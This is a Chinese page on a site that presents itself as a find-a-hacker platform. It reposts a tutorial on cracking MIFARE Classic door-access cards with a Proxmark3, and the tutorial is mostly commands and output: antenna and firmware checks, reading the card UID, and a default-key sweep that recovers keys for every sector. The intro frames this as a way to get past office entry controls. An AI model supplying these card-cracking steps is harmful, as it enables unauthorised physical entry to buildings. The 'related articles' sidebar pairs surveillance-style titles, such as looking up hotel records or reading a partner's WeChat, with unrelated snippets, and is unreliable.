找黑客平台

RFID Hacking ④:ProxMark3 破解门禁

访客4年前黑客资讯1102

  国际黑客大会Defcon传统之一:开锁!因为黑客认为锁也是一种安全挑战。我们在黑客题材电影、电视剧中也常常看到:男主女主利用高超的黑客技能侵入目标公司的 *** ,甚至利用社会工程学突破门禁防护潜入对方办公地点进行物理攻击,如入无人之境。(神盾局、黑客军团、Who am i 貌似都有类似情节)

  

  北上广不相信眼泪 16集

  在这一背景下,我们不经思考:门禁系统作为企业物理之一道屏障,这些硬件基础设施安全是否一直都被忽视?

  0×01 准备工作

  

  Linux、Windows环境搭建可参考:RFID Hacking②:PM3入门指南 一文。

  

  1.1 进入PM3工作终端

   /dev/ttyACM0

  1.2 测试天线

  proxmark3> hw tune # LF antenna: 29.98 V @ 125.00 kHz # LF antenna: 30.39 V @ 134.00 kHz # LF optimal: 36.30 V @ 129.03 kHz # HF antenna: 27.90 V @ 13.56 MHz proxmark3>

  1.3 设备固件

  proxmark3> hw ver#db# Prox/RFID mark3 RFID instrument #db# bootrom: /-suspect 2015-04-02 15:12:04 #db# os: /-suspect 2015-04-02 15:12:11 #db# HF FPGA image built on 2015/03/09 at 08:41:42

  0×02 爆破&枚举秘钥

  2.1 读取卡片

  proxmark3> hf 14a readerATQA : 04 00 UID : 2c f0 55 0b SAK : 08 [2] TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 proprietary non iso14443a-4 card found, RATS not supported

  2.2 执行NESTED攻击,枚举&爆破key:

  proxmark3> hf mf chk *1 ? tNo key specified,try default keys chk default key[0] ffffffffffff chk default key[1] 000000000000 chk default key[2] a0a1a2a3a4a5 chk default key[3] b0b1b2b3b4b5 chk default key[4] aabbccddeeff chk default key[5] 4d3a99c351dd chk default key[6] 1a982c7e459a chk default key[7] d3f7d3f7d3f7 chk default key[8] 714c5c886e97 chk default key[9] 587ee5f9350f chk default key[10] a0478cc39091 chk default key[11] 533cb6c723f6 chk default key[12] 8fd0a4f256e9 --SectorsCnt:0 block no:0x03 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:1 block no:0x07 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:2 block no:0x0b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:3 block no:0x0f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:4 block no:0x13 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:5 block no:0x17 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:6 block no:0x1b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:7 block no:0x1f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:8 block no:0x23 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:9 block no:0x27 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:10 block no:0x2b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:11 block no:0x2f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:12 block no:0x33 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:13 block no:0x37 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:14 block no:0x3b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:15 block no:0x3f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:0 block no:0x03 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:1 block no:0x07 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:2 block no:0x0b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:3 block no:0x0f key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:4 block no:0x13 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:5 block no:0x17 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:6 block no:0x1b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:7 block no:0x1f key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:8 block no:0x23 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:9 block no:0x27 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:10 block no:0x2b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:11 block no:0x2f key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:12 block no:0x33 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:13 block no:0x37 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:14 block no:0x3b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:15 block no:0x3f key type:B key count:13 Found valid key:[ffffffffffff] proxmark3>

标签: RFID Hacking ④:ProxMark3 破解门禁
返回列表

上一篇:能打的产品经理,如何保证项目如期上线

下一篇:微信短视频加速,张小龙的步子不妨更大一些!

相关文章

用身份证怎么查询自己的开房记录

    微信图片作为我们微信聊天中所经常会使用到的媒体文件,我...

女朋友能查到我的微信聊天内容吗

美赞臣的奶粉是很出名的,不少人给自己的孩子准备的是美赞臣的奶粉,不过孩子盾奶的时候吃美赞臣三段奶粉好不好呢,有的人说美赞臣三段奶粉特别的甜是真的吗,友谊长存小编就带来测评。 美赞臣三段奶粉试用测评...

韩国总统文在寅支持富商周滨的父亲是谁率创新低 宣布改组内阁

  中新社首尔12月4日电 (记者 曾鼐)韩国总统文在寅4日宣布改组内阁,拟更换国土交通部、行政安全部、保健福祉部和女性家族部四个部长官。 资料图:韩国总统文在寅。 青瓦台供图   近来,文...

木偶奇遇记皮诺曹的故事(木偶奇遇记内容概括)

《木偶奇遇记》是深刻在我们童年记忆中的童话故事,父母总是告诉我们,别说谎哦,不然会和匹诺曹一样长出长鼻子。 小时候,我觉得童话的人一定拥有一颗善良和美丽的心,不然怎么会写出如此充满希望又带有光芒的文字...

小学生都会挖掘的JSON Hijacking实战利用

JSON Hijacking缝隙的具体使用,有点相似与CSRF,不过原理使用方法不同,在这边文章我侧重解说json跨域绑架的使用环境建立与方法。 0×01缝隙的发掘 一般发掘的过程中,burpsuit...

杨超越什么梗(为什么叫杨超越是锦鲤体质头像)

  杨超越什么梗(为什么叫杨超越是锦鲤体质头像)   大家对于杨超越的印象就是她有着一张极其可人的脸庞,但是绝对不会提到她的实力,在队伍当中她也是一个十分另类的艺人,不会唱歌不会跳舞,但在网络上的人气...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.